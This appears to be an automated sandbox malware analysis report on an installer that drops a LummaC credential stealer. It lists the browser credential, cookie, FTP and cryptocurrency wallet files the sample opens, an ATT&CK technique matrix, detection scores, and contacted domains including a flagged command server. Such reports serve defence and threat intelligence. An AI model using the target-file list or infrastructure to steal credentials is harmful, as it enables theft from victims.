Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Glow.com	Binary or memory string: WIN_81
Source: Glow.com	Binary or memory string: WIN_XP
Source: Problems.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Glow.com	Binary or memory string: WIN_XPe
Source: Glow.com	Binary or memory string: WIN_VISTA
Source: Glow.com	Binary or memory string: WIN_7
Source: Glow.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_00402263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		10_2_00402263
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_00401C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		10_2_00401C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	31 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	38 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	13 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Virtualization/Sandbox Evasion	DCSync	5 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Full-Setup.exe	60%	Virustotal		Browse
Full-Setup.exe	58%	ReversingLabs	Win32.Ransomware.LummaC

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\600044\Glow.com	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
rentry.co	104.26.3.16	true	false	high
kitteprincv.click	104.21.43.127	true	true	unknown
xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHugg	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
sordid-snaked.cyou	false	high
deafeninggeh.biz	false	high
diffuculttan.xyz	false	high
effecterectz.xyz	false	high
wrathful-jammy.cyou	false	high
https://rentry.co/feouewe5/raw	false	high
awake-weaves.cyou	false	high
immureprech.biz	false	high
kitteprincv.click	true	unknown
debonairnukk.xyz	false	high
https://kitteprincv.click/api	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.microvr	powershell.exe, 0000000F.00000002.2394229441.0000000003066000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rentry.co/whathZ	powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rentry.co/hZ	powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.autoitscript.com/autoit3/	Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	false	high
https://kitteprincv.click:443/api	Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://rentry.co/static/icons/512.pnghZ	powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://x1.c.lencr.org/0	Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	false	high
http://x1.i.lencr.org/0	Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Glow.com, 0000000A.00000003.2215604698.0000000001750000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
https://rentry.co/what	powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.dr	false	high
https://rentry.co:443/feouewe5/raw	Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.mozilla.org/products/firefoxgro.all	Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://kitteprincv.click:443/apiH111H65H70H121H113H109H98H111H98H117H106H112H111H65H66H101H119H102H	Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://kitteprincv.click/api1)	Glow.com, 0000000A.00000002.2492595373.0000000001388000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
https://rentry.co/static/icons/512.png	4VQOL9Z4BW428506NY343FUN.ps1.10.dr	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.autoitscript.com/autoit3/X	Glow.com, 0000000A.00000000.1729969732.0000000000455000.00000002.00000001.01000000.00000006.sdmp, Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Problems.0.dr	false	high
http://ocsp.rootca1.amazontrust.com0:	Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	Full-Setup.exe	false	high
https://www.ecosia.org/newtab/	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	false	high
